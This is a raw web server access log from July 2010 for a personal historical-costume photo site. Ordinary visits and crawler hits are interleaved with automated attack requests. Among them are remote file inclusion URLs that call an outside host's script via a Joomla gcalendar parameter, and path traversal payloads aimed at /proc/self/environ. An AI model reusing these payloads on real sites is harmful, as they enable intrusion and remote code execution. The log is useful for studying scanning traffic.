124.6.181.72 - - [05/Jul/2010:06:10:47 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:10:48 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:47 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:48 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:49 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:49 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:50 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:50 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:50 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:51 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:53 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:54 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:55 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.6.181.72 - - [05/Jul/2010:06:11:56 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
92.60.176.46 - - [05/Jul/2010:06:12:18 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:12:22 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:12:22 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:13:01 -0500] "GET /logs/access_log.1275609600%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
202.229.183.186 - - [05/Jul/2010:06:13:02 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
92.60.176.46 - - [05/Jul/2010:06:19:28 -0500] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12140 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:19:28 -0500] "GET /logs/access_log.1277164800%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:19:28 -0500] "GET //?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
81.3.150.104 - - [05/Jul/2010:06:20:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
81.3.150.104 - - [05/Jul/2010:06:20:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
92.60.176.46 - - [05/Jul/2010:06:20:28 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:20:29 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:20:29 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:20:54 -0500] "GET /logs/access_log.1275609600%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:21:56 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:21:59 -0500] "GET /logs/access_log.1276732800/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:21:59 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
184.73.3.111 - - [05/Jul/2010:06:23:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.3.111 - - [05/Jul/2010:06:23:04 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.3.111 - - [05/Jul/2010:06:24:04 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.3.111 - - [05/Jul/2010:06:24:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.3.111 - - [05/Jul/2010:06:24:47 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.3.111 - - [05/Jul/2010:06:24:50 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
92.60.176.46 - - [05/Jul/2010:06:25:12 -0500] "GET /logs/access_log.1276819200%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
184.73.3.111 - - [05/Jul/2010:06:25:21 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
124.182.186.49 - - [05/Jul/2010:06:26:00 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com.au/search?hl=en&safe=active&q=german+dragoon+costume+1700s&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:26:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.195.112.180 - - [05/Jul/2010:06:26:52 -0500] "GET /artwork/music.htm HTTP/1.0" 200 577 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.182.186.49 - - [05/Jul/2010:06:27:01 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:02 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.1" 200 17492 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:02 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.1" 200 17534 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:02 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.1" 200 17209 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:02 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.1" 200 16386 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:03 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.1" 200 18119 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:03 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:03 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.1" 200 16029 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:03 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 200 15105 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:03 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.1" 200 19168 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:04 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 200 16328 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:04 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.1" 200 15860 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:04 -0500] "GET /costume/costume80.JPG HTTP/1.1" 200 67426 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:27 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
124.182.186.49 - - [05/Jul/2010:06:27:33 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
202.229.183.186 - - [05/Jul/2010:06:27:47 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
202.229.183.186 - - [05/Jul/2010:06:28:23 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
67.195.112.180 - - [05/Jul/2010:06:28:50 -0500] "GET /logs/access_log.1203120000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:41 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:29:42 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.60.176.46 - - [05/Jul/2010:06:30:19 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:30:20 -0500] "GET /logs/access_log.1276646400/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:30:20 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
174.142.75.115 - - [05/Jul/2010:06:31:03 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.24.59 - - [05/Jul/2010:06:31:30 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.142.61.241 - - [05/Jul/2010:06:31:33 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.136.63.119 - - [05/Jul/2010:06:31:34 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.142.75.115 - - [05/Jul/2010:06:32:40 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:06:33:30 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.136.63.119 - - [05/Jul/2010:06:33:57 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.142.61.241 - - [05/Jul/2010:06:34:25 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:06:34:31 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
94.136.63.119 - - [05/Jul/2010:06:34:40 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
92.60.176.46 - - [05/Jul/2010:06:34:46 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:34:46 -0500] "GET /logs/access_log.1277164800/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:35:05 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:35:08 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:35:08 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
174.142.61.241 - - [05/Jul/2010:06:35:40 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.246.62.189 - - [05/Jul/2010:06:35:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
174.142.61.241 - - [05/Jul/2010:06:36:18 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.142.75.115 - - [05/Jul/2010:06:36:22 -0500] "GET /logs/access_log.1276300800//index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:06:36:22 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:06:36:22 -0500] "GET /logs//index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
92.60.176.46 - - [05/Jul/2010:06:38:08 -0500] "GET /logs/access_log.1276732800%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
85.255.199.38 - - [05/Jul/2010:06:38:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
85.255.199.38 - - [05/Jul/2010:06:38:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.60.176.46 - - [05/Jul/2010:06:39:00 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:39:00 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:06:39:01 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
174.142.61.241 - - [05/Jul/2010:06:39:14 -0500] "GET /logs/access_log.1276300800//index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:06:39:14 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5